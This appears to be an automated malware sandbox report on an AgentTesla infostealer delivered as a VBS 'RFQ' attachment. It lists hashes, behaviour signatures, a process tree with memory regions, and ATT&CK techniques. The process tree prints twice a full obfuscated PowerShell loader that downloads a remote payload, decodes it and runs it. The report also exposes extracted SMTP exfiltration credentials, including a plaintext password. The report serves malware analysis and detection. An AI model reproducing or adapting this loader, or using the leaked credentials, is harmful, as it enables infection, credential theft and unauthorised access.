Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-03-2024 06:57

General

  • Target

    RFQ20240327_Commerical List.vbs

  • Size

    37KB

  • MD5

    3ff689ec2afa2b53b3d5ae76311c9134

  • SHA1

    d97f2bc2c8b06b112853f5a90957b74e5483d75c

  • SHA256

    06170ef8b08bd8d2e7852f0223a3a5cfcd2e13110424a091e97da539cb5daeab

  • SHA512

    c47944327eff299d4f2a35b288016614b538c6920546d311406202b79d22155a82b2d498be78a6a57be3a826583a8e286c45d8a8f562215b8f99f92b62f1ac09

  • SSDEEP

    768:u0NgBv2rWAZGc8NnKwiQmV1RuAP11GtbpZS:+cqNnKwGuUvmbC

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.inkomech.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    Amir@2021

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ20240327_Commerical List.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3772
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Smilehullet Preorganic brakier Skggeste Prolarva Paafugl #>;$Esther=(cmd /c set /A 115^^0);Function Ingloriously7 ([String]$Vandene){$Trompillo=[char][int]$Esther+'ubstring';$Borteskamoterende=8;$Glorifikationernes=Forttte12($Vandene);For($Flovende=7; $Flovende -lt $Glorifikationernes; $Flovende+=$Borteskamoterende){$Mrkekamres=$Vandene.$Trompillo.Invoke($Flovende, 1);$Supposal=$Supposal+$Mrkekamres;}$Supposal;}function Ventesalen ($Leasable){. ($Hulebeboeren33) ($Leasable);}function Forttte12 ([String]$Rubricality){$Tepefied=$Rubricality.Length-1;$Tepefied;}$Nasalised=Ingloriously7 'Gyneci.TDulcianr ontumeatem eranBr.epsysBahamiafTibe breRecit.rrPtolemerMalacatiNondangn bestemg,npriza ';$Vaek=Ingloriously7 'Alantu,hFodermetInbreedtKrilr npSapiencs Lang,u:commona/ Yde,vg/.enneskdHae.ogrrDiscoveiBirchmavKluddere Maalka.Oest.uagHy eremoPreverioClo preg GennemlBe,nninepcton g.HenryktcLithogroGulyshrmFondsbr/Re,roseu fusio,cRestful? Reg,ese NitramxBas oonpAffdninoPresse rPuckfoitBipyrid=SmalhandD ttessoNationawOpv,sninIdvandelSubadmio MonotoaBon,emad Coloni&EmblazoiDecousudriatacl=rhizina1 Sandl 7Lderbry_TaenidiXUnrepreEAdmitte9BydrengERundpi,-Flodildi Jewryc0VariatiiReno,at8UnderafRUn.ergiY AecidiVS.garsdNPe tingvShertheo hyrdenJRvesaksjMakulatk recleaG A,quis5 FatherR Mae.ad-RevolutpSkovserkPla.chegGastronxP.efileABa.okbyZRevo,utrBelizer_Ea,ings ';$Hulebeboeren33=Ingloriously7 ' Fremt,i hydrare Malko.xy.wynep ';$Koalitionspartnernes218=Ingloriously7 ',enanth$Sver.gegAnatomolLan sbyoEndelsebPilsnera Sbe.rtl,aarets:Ove,broAOfthi,kaDisp,umrUnfathograahv,da Orientmdy,ecellNormot.efstegaasSy logi Duvetin= Mocsol PetershSResinbut Bek.mbaunsuscerMilitantSpartli-,scalopB,dstraai SoejletTermogrsEosop,oTSkrubsarL.mpineaSirmuelnNormernsEuph oef .ristoeSkrid er Gengan Uniform-FlkhammSSeasoneoskattebuSermoner ArthrocrepremieWheelag Telesiu$ImpertuVAeterenaRetrieveFlaviahkCladodo Radioda-geminatDStenchieHexamersFis eplt FilspaiSlambadnP,etrocaBaalzebtTrinit iHydrodyoDiagnosnCupro,s Valutac$ScenevaTHan.elseRepa,atrBums.tfeGarrot,b BlecidaThoughttT,ermiteEpoxym. ';Ventesalen (Ingloriously7 'Crow.ma$Lingto.gPharmaclDiskantoSodomi bAa ringaPeesa hlBygning:DoxorubT .ttribe SubirrrGyro ore ,abrikbdict.toa BrigadtKondolee Nyfald=Multipr$Tapetdre StorkenSpildevv.endine:Atomteoa PetrokpamniotepOppressdBltespnaAdventit DsetsaaAgerkaa ') ;Ventesalen (Ingloriously7 ' A pergIPernillm,ynchrop agaceroOrangewrUdkantstAnlgsfo-AfklariMTruncusoIndgravd H postuEnterpilK,mmanded mensi ProcentBBargeb ibehr.gbt Sagnoms ArchikT EmbargrUnslatiaIns.minnDromoitsSmudsomfMeg bareStrgkunrsillago ') ;$Terebate=$Terebate+'\Forklifts.Rin' ;Ventesalen (Ingloriously7 'Aede ga$ Ps udog DespislRoadtraoSpillefb Srverla Allittl Clouee:bevbnerSChiselaeHalfpenlPeleghaeAdressen TroposiUnphrend Abeliae .ocktarInkassoaHulbaan=Normali(HeroiniT G undfe PhyllosInd,ivntD ffeds-OverlbeP BonitsaTurstritBulbulbhNemoric ecstati$ BulkieTPensummeShavegrrKa,italeFry setbForseg,aReawaketRaadslaeAdulte,) evigli ') ;while (-not $Selenidera) {Ventesalen (Ingloriously7 'acquisiI UdsgtffSilence Lapa er(modstt $CoorsskAGnaske,a Irritar OvermogtonicocaWiten,gmVledesilFerrotyeRytterisForepro.TransfoJGambl,noUnacquibProustiSTilfgnetRazi,goa HaandetSkoserteSericin mimiam-alwine,eAgonistqFant,dd billedv$MarginvNGinglesa DrabsesUnbast aComputel venn.siAnamnessReconcie Vks bedVkstfas)Lastepa publiku{Nankin SBas onetTyrrgryaOvers,urElektritArchere-Cranki.SP,aemislVandrete Skn,edeParate.pTronhim Masknin1 Pa.frt}RedediceFremhvnlBygkornsA naliseEr.ring{.uphorbSSonambutInterj,aBarrierrUnderlitShewasn-Medde,eSAabninglI.spekte FungifeBorgerlpLotuk.p Antikvi1Christo; Autog.VRud,leseRevivornSolbrretMo.tenseP rafrasTrimnina G irsplTownshieSynsindn Bonbo Efterve$ MosekoKStareneoDensitea Bla.lulPennalhiToxemiatFl.rieriGudeligoS,inettn SprinksAgterhapAfskedsaBlidernrBleskivt LedastnHesioneeelectrorGrundlon UncompeMrtelvrsUncomme2Ganodon1Pseudos8communi}ecbolic ');Ventesalen (Ingloriously7 'Seminar$Enke,tdgSpirit lDervekooForstrkbAbirrita MarkrklStrmpes:PanderlSSka,lere Speltzl europheRos,lilnForsknii.eformpdChrist,eimpossirDatadivaJamesin=Komplic(valsevrT Ben ibeStandarsPhallictB.nedic-SinusfuP TndstiaSarandotBegyndehMidport ,dlgsfo$BryggedTMingli eUforfalrGruppeseDaabunobOviculaaSaddelktPungroteunmanif) Aalbor ') ;}Ventesalen (Ingloriously7 'Unpayin$ SkuretgAl.ersslS.cialpoRestlesbOpslag aAnasarclHorsebr: Kn.benPStuega rInterdeo mu,escdLivmodeuBlodprvc .mlacre Cubi orWergeldeCy,selitTogbetj Turne,e=Epiplas Brie,neGRive.ileHjemmegt Unrefr- MahaafCNe.tralo FartgrnBillboatTeoretieZoophilnBnkbogctPantefo Desinfo$SallownTSvuppeneMa,iporr,olenoceBemournbIndsbrea SolekltPoloniueRe rmar ');Ventesalen (Ingloriously7 'Oprrshr$Hyls reg Chillulud.ringo IsattebPres,pea ProctolSkibsvr:ForskniF GentialCrucianoAger.okoBuffontkTicklesa Gg stonPre efi Abekat = Efters Poplyde[Re ieveSInstru.y InfarcsPlat.ertTvebople BetastmBeskrin.WeighbrCfillovioLinjetlnTrustedvPoli.ike stvsugrMiljtiltEndosse]Nasaump:Grassch:forhaanFT,ansfor Blin,eoLemmieemOttreliBForngteaKammerjsTranspoeOversat6Tllenr,4LimstenS Prote,tTekstferDecompeiRepartinIhla.tigPres,yt(Reposse$ KeraunPSta,mefr Fo.pago ollektdtilstrbuU mediac.ommandeStempe,r.veranie,errorbtBetonie)Branche ');Ventesalen (Ingloriously7 ' myster$ VelforgKlbri vlSnirkleoAldeh dbTrlleara FrogfllAvertis: UddataGPha.acir Trafike.ynderny tor sub.latworeTil.ageaGagmandr DokumedFastuou Udmund =Thu der Figentr[SektionSPhosphiy Saddles Leger tGamophae SubsynmNegerss.UndersgTCrebriseniffcanxElektrotB.itzkr.Pl.riliE,orudben,estterc Ekstrao PredardDeplumaiEfterbenT.uchergEksamin] Asnssu: Ln,lid:MartyriAnotifieSKylli,gCeq.alizI BearskIHukecac.JugoslaG Svinghe LakkettDicyemiS Klinikt Sparsmrdermoidi Histoln Smaabrgs,henes(Sankend$AdhakabF SemipelDryssfooSkovseroSessresk.ibachiaAntecelnTreto,m)Graaspu ');Ventesalen (Ingloriously7 'Frokost$Jernp rgSkatteelstky teoStempelb Ma,ghaaMegal,clAccente:BeredniVChatteliPariaerk,mbolteiLnklasse,uppedssIllumin=grundv $J,rrymaGNotecasr.alleineAkkumulySnirklebByggemoeSejlfriaund,rdrrZombiend Extras. GennemsEuphuizuMisc,nobMacc.iasKasida.tInt.acorEmissioi SqueggnMenuk rg Kforwa(Kafeens3.artens6 Antine3 Gte ag5 Unlink4O.erwis1Bruseh.,Skle,os3Tandtek1repercu9Profess3Archsno4Assauge)Laryngo ');Ventesalen $Vikies;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:5004
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Smilehullet Preorganic brakier Skggeste Prolarva Paafugl #>;$Esther=(cmd /c set /A 115^^0);Function Ingloriously7 ([String]$Vandene){$Trompillo=[char][int]$Esther+'ubstring';$Borteskamoterende=8;$Glorifikationernes=Forttte12($Vandene);For($Flovende=7; $Flovende -lt $Glorifikationernes; $Flovende+=$Borteskamoterende){$Mrkekamres=$Vandene.$Trompillo.Invoke($Flovende, 1);$Supposal=$Supposal+$Mrkekamres;}$Supposal;}function Ventesalen ($Leasable){. ($Hulebeboeren33) ($Leasable);}function Forttte12 ([String]$Rubricality){$Tepefied=$Rubricality.Length-1;$Tepefied;}$Nasalised=Ingloriously7 'Gyneci.TDulcianr ontumeatem eranBr.epsysBahamiafTibe breRecit.rrPtolemerMalacatiNondangn bestemg,npriza ';$Vaek=Ingloriously7 'Alantu,hFodermetInbreedtKrilr npSapiencs Lang,u:commona/ Yde,vg/.enneskdHae.ogrrDiscoveiBirchmavKluddere Maalka.Oest.uagHy eremoPreverioClo preg GennemlBe,nninepcton g.HenryktcLithogroGulyshrmFondsbr/Re,roseu fusio,cRestful? Reg,ese NitramxBas oonpAffdninoPresse rPuckfoitBipyrid=SmalhandD ttessoNationawOpv,sninIdvandelSubadmio MonotoaBon,emad Coloni&EmblazoiDecousudriatacl=rhizina1 Sandl 7Lderbry_TaenidiXUnrepreEAdmitte9BydrengERundpi,-Flodildi Jewryc0VariatiiReno,at8UnderafRUn.ergiY AecidiVS.garsdNPe tingvShertheo hyrdenJRvesaksjMakulatk recleaG A,quis5 FatherR Mae.ad-RevolutpSkovserkPla.chegGastronxP.efileABa.okbyZRevo,utrBelizer_Ea,ings ';$Hulebeboeren33=Ingloriously7 ' Fremt,i hydrare Malko.xy.wynep ';$Koalitionspartnernes218=Ingloriously7 ',enanth$Sver.gegAnatomolLan sbyoEndelsebPilsnera Sbe.rtl,aarets:Ove,broAOfthi,kaDisp,umrUnfathograahv,da Orientmdy,ecellNormot.efstegaasSy logi Duvetin= Mocsol PetershSResinbut Bek.mbaunsuscerMilitantSpartli-,scalopB,dstraai SoejletTermogrsEosop,oTSkrubsarL.mpineaSirmuelnNormernsEuph oef .ristoeSkrid er Gengan Uniform-FlkhammSSeasoneoskattebuSermoner ArthrocrepremieWheelag Telesiu$ImpertuVAeterenaRetrieveFlaviahkCladodo Radioda-geminatDStenchieHexamersFis eplt FilspaiSlambadnP,etrocaBaalzebtTrinit iHydrodyoDiagnosnCupro,s Valutac$ScenevaTHan.elseRepa,atrBums.tfeGarrot,b BlecidaThoughttT,ermiteEpoxym. ';Ventesalen (Ingloriously7 'Crow.ma$Lingto.gPharmaclDiskantoSodomi bAa ringaPeesa hlBygning:DoxorubT .ttribe SubirrrGyro ore ,abrikbdict.toa BrigadtKondolee Nyfald=Multipr$Tapetdre StorkenSpildevv.endine:Atomteoa PetrokpamniotepOppressdBltespnaAdventit DsetsaaAgerkaa ') ;Ventesalen (Ingloriously7 ' A pergIPernillm,ynchrop agaceroOrangewrUdkantstAnlgsfo-AfklariMTruncusoIndgravd H postuEnterpilK,mmanded mensi ProcentBBargeb ibehr.gbt Sagnoms ArchikT EmbargrUnslatiaIns.minnDromoitsSmudsomfMeg bareStrgkunrsillago ') ;$Terebate=$Terebate+'\Forklifts.Rin' ;Ventesalen (Ingloriously7 'Aede ga$ Ps udog DespislRoadtraoSpillefb Srverla Allittl Clouee:bevbnerSChiselaeHalfpenlPeleghaeAdressen TroposiUnphrend Abeliae .ocktarInkassoaHulbaan=Normali(HeroiniT G undfe PhyllosInd,ivntD ffeds-OverlbeP BonitsaTurstritBulbulbhNemoric ecstati$ BulkieTPensummeShavegrrKa,italeFry setbForseg,aReawaketRaadslaeAdulte,) evigli ') ;while (-not $Selenidera) {Ventesalen (Ingloriously7 'acquisiI UdsgtffSilence Lapa er(modstt $CoorsskAGnaske,a Irritar OvermogtonicocaWiten,gmVledesilFerrotyeRytterisForepro.TransfoJGambl,noUnacquibProustiSTilfgnetRazi,goa HaandetSkoserteSericin mimiam-alwine,eAgonistqFant,dd billedv$MarginvNGinglesa DrabsesUnbast aComputel venn.siAnamnessReconcie Vks bedVkstfas)Lastepa publiku{Nankin SBas onetTyrrgryaOvers,urElektritArchere-Cranki.SP,aemislVandrete Skn,edeParate.pTronhim Masknin1 Pa.frt}RedediceFremhvnlBygkornsA naliseEr.ring{.uphorbSSonambutInterj,aBarrierrUnderlitShewasn-Medde,eSAabninglI.spekte FungifeBorgerlpLotuk.p Antikvi1Christo; Autog.VRud,leseRevivornSolbrretMo.tenseP rafrasTrimnina G irsplTownshieSynsindn Bonbo Efterve$ MosekoKStareneoDensitea Bla.lulPennalhiToxemiatFl.rieriGudeligoS,inettn SprinksAgterhapAfskedsaBlidernrBleskivt LedastnHesioneeelectrorGrundlon UncompeMrtelvrsUncomme2Ganodon1Pseudos8communi}ecbolic ');Ventesalen (Ingloriously7 'Seminar$Enke,tdgSpirit lDervekooForstrkbAbirrita MarkrklStrmpes:PanderlSSka,lere Speltzl europheRos,lilnForsknii.eformpdChrist,eimpossirDatadivaJamesin=Komplic(valsevrT Ben ibeStandarsPhallictB.nedic-SinusfuP TndstiaSarandotBegyndehMidport ,dlgsfo$BryggedTMingli eUforfalrGruppeseDaabunobOviculaaSaddelktPungroteunmanif) Aalbor ') ;}Ventesalen (Ingloriously7 'Unpayin$ SkuretgAl.ersslS.cialpoRestlesbOpslag aAnasarclHorsebr: Kn.benPStuega rInterdeo mu,escdLivmodeuBlodprvc .mlacre Cubi orWergeldeCy,selitTogbetj Turne,e=Epiplas Brie,neGRive.ileHjemmegt Unrefr- MahaafCNe.tralo FartgrnBillboatTeoretieZoophilnBnkbogctPantefo Desinfo$SallownTSvuppeneMa,iporr,olenoceBemournbIndsbrea SolekltPoloniueRe rmar ');Ventesalen (Ingloriously7 'Oprrshr$Hyls reg Chillulud.ringo IsattebPres,pea ProctolSkibsvr:ForskniF GentialCrucianoAger.okoBuffontkTicklesa Gg stonPre efi Abekat = Efters Poplyde[Re ieveSInstru.y InfarcsPlat.ertTvebople BetastmBeskrin.WeighbrCfillovioLinjetlnTrustedvPoli.ike stvsugrMiljtiltEndosse]Nasaump:Grassch:forhaanFT,ansfor Blin,eoLemmieemOttreliBForngteaKammerjsTranspoeOversat6Tllenr,4LimstenS Prote,tTekstferDecompeiRepartinIhla.tigPres,yt(Reposse$ KeraunPSta,mefr Fo.pago ollektdtilstrbuU mediac.ommandeStempe,r.veranie,errorbtBetonie)Branche ');Ventesalen (Ingloriously7 ' myster$ VelforgKlbri vlSnirkleoAldeh dbTrlleara FrogfllAvertis: UddataGPha.acir Trafike.ynderny tor sub.latworeTil.ageaGagmandr DokumedFastuou Udmund =Thu der Figentr[SektionSPhosphiy Saddles Leger tGamophae SubsynmNegerss.UndersgTCrebriseniffcanxElektrotB.itzkr.Pl.riliE,orudben,estterc Ekstrao PredardDeplumaiEfterbenT.uchergEksamin] Asnssu: Ln,lid:MartyriAnotifieSKylli,gCeq.alizI BearskIHukecac.JugoslaG Svinghe LakkettDicyemiS Klinikt Sparsmrdermoidi Histoln Smaabrgs,henes(Sankend$AdhakabF SemipelDryssfooSkovseroSessresk.ibachiaAntecelnTreto,m)Graaspu ');Ventesalen (Ingloriously7 'Frokost$Jernp rgSkatteelstky teoStempelb Ma,ghaaMegal,clAccente:BeredniVChatteliPariaerk,mbolteiLnklasse,uppedssIllumin=grundv $J,rrymaGNotecasr.alleineAkkumulySnirklebByggemoeSejlfriaund,rdrrZombiend Extras. GennemsEuphuizuMisc,nobMacc.iasKasida.tInt.acorEmissioi SqueggnMenuk rg Kforwa(Kafeens3.artens6 Antine3 Gte ag5 Unlink4O.erwis1Bruseh.,Skle,os3Tandtek1repercu9Profess3Archsno4Assauge)Laryngo ');Ventesalen $Vikies;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4852
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:4828
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3344
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1416 --field-trial-handle=2700,i,14629483171127516024,12350888228055326066,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:5076

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Command and Control

        Web Service

        1
        T1102

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bekteacu.p22.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/2804-0-0x0000016373E30000-0x0000016373E52000-memory.dmp
          Filesize

          136KB

        • memory/2804-11-0x0000016372F30000-0x0000016372F40000-memory.dmp
          Filesize

          64KB

        • memory/2804-36-0x0000016372F30000-0x0000016372F40000-memory.dmp
          Filesize

          64KB

        • memory/2804-12-0x0000016372F30000-0x0000016372F40000-memory.dmp
          Filesize

          64KB

        • memory/2804-13-0x0000016372F30000-0x0000016372F40000-memory.dmp
          Filesize

          64KB

        • memory/2804-14-0x00000163741E0000-0x0000016374206000-memory.dmp
          Filesize

          152KB

        • memory/2804-15-0x0000016374390000-0x00000163743A4000-memory.dmp
          Filesize

          80KB

        • memory/2804-35-0x00007FF9AD740000-0x00007FF9AE201000-memory.dmp
          Filesize

          10.8MB

        • memory/2804-75-0x00007FF9AD740000-0x00007FF9AE201000-memory.dmp
          Filesize

          10.8MB

        • memory/2804-10-0x00007FF9AD740000-0x00007FF9AE201000-memory.dmp
          Filesize

          10.8MB

        • memory/3344-54-0x0000000077631000-0x0000000077751000-memory.dmp
          Filesize

          1.1MB

        • memory/3344-77-0x00000000254D0000-0x000000002556C000-memory.dmp
          Filesize

          624KB

        • memory/3344-81-0x0000000025C40000-0x0000000025CD2000-memory.dmp
          Filesize

          584KB

        • memory/3344-76-0x00000000253E0000-0x0000000025430000-memory.dmp
          Filesize

          320KB

        • memory/3344-82-0x00000000254B0000-0x00000000254BA000-memory.dmp
          Filesize

          40KB

        • memory/3344-72-0x0000000025030000-0x0000000025040000-memory.dmp
          Filesize

          64KB

        • memory/3344-70-0x0000000000870000-0x00000000008B2000-memory.dmp
          Filesize

          264KB

        • memory/3344-83-0x0000000025030000-0x0000000025040000-memory.dmp
          Filesize

          64KB

        • memory/3344-80-0x0000000074C10000-0x00000000753C0000-memory.dmp
          Filesize

          7.7MB

        • memory/3344-71-0x0000000074C10000-0x00000000753C0000-memory.dmp
          Filesize

          7.7MB

        • memory/3344-68-0x0000000077631000-0x0000000077751000-memory.dmp
          Filesize

          1.1MB

        • memory/3344-67-0x0000000000870000-0x0000000001AC4000-memory.dmp
          Filesize

          18.3MB

        • memory/3344-53-0x00000000776B8000-0x00000000776B9000-memory.dmp
          Filesize

          4KB

        • memory/4852-20-0x0000000004C60000-0x0000000004C82000-memory.dmp
          Filesize

          136KB

        • memory/4852-39-0x0000000006DC0000-0x0000000006E56000-memory.dmp
          Filesize

          600KB

        • memory/4852-43-0x0000000007040000-0x0000000007054000-memory.dmp
          Filesize

          80KB

        • memory/4852-44-0x0000000004790000-0x00000000047A0000-memory.dmp
          Filesize

          64KB

        • memory/4852-45-0x0000000074C10000-0x00000000753C0000-memory.dmp
          Filesize

          7.7MB

        • memory/4852-46-0x00000000072F0000-0x00000000072F1000-memory.dmp
          Filesize

          4KB

        • memory/4852-47-0x0000000008570000-0x000000000D914000-memory.dmp
          Filesize

          83.6MB

        • memory/4852-48-0x0000000004790000-0x00000000047A0000-memory.dmp
          Filesize

          64KB

        • memory/4852-50-0x0000000004790000-0x00000000047A0000-memory.dmp
          Filesize

          64KB

        • memory/4852-51-0x0000000077631000-0x0000000077751000-memory.dmp
          Filesize

          1.1MB

        • memory/4852-52-0x0000000004790000-0x00000000047A0000-memory.dmp
          Filesize

          64KB

        • memory/4852-41-0x0000000007FC0000-0x0000000008564000-memory.dmp
          Filesize

          5.6MB

        • memory/4852-40-0x0000000006D70000-0x0000000006D92000-memory.dmp
          Filesize

          136KB

        • memory/4852-42-0x0000000006FE0000-0x0000000007002000-memory.dmp
          Filesize

          136KB

        • memory/4852-69-0x0000000074C10000-0x00000000753C0000-memory.dmp
          Filesize

          7.7MB

        • memory/4852-38-0x0000000006140000-0x000000000615A000-memory.dmp
          Filesize

          104KB

        • memory/4852-37-0x0000000007390000-0x0000000007A0A000-memory.dmp
          Filesize

          6.5MB

        • memory/4852-34-0x0000000005B90000-0x0000000005BDC000-memory.dmp
          Filesize

          304KB

        • memory/4852-33-0x0000000005B60000-0x0000000005B7E000-memory.dmp
          Filesize

          120KB

        • memory/4852-32-0x0000000005560000-0x00000000058B4000-memory.dmp
          Filesize

          3.3MB

        • memory/4852-22-0x0000000005470000-0x00000000054D6000-memory.dmp
          Filesize

          408KB

        • memory/4852-21-0x0000000004D00000-0x0000000004D66000-memory.dmp
          Filesize

          408KB

        • memory/4852-19-0x0000000004DD0000-0x00000000053F8000-memory.dmp
          Filesize

          6.2MB

        • memory/4852-18-0x0000000002230000-0x0000000002266000-memory.dmp
          Filesize

          216KB

        • memory/4852-17-0x0000000004790000-0x00000000047A0000-memory.dmp
          Filesize

          64KB

        • memory/4852-16-0x0000000074C10000-0x00000000753C0000-memory.dmp
          Filesize

          7.7MB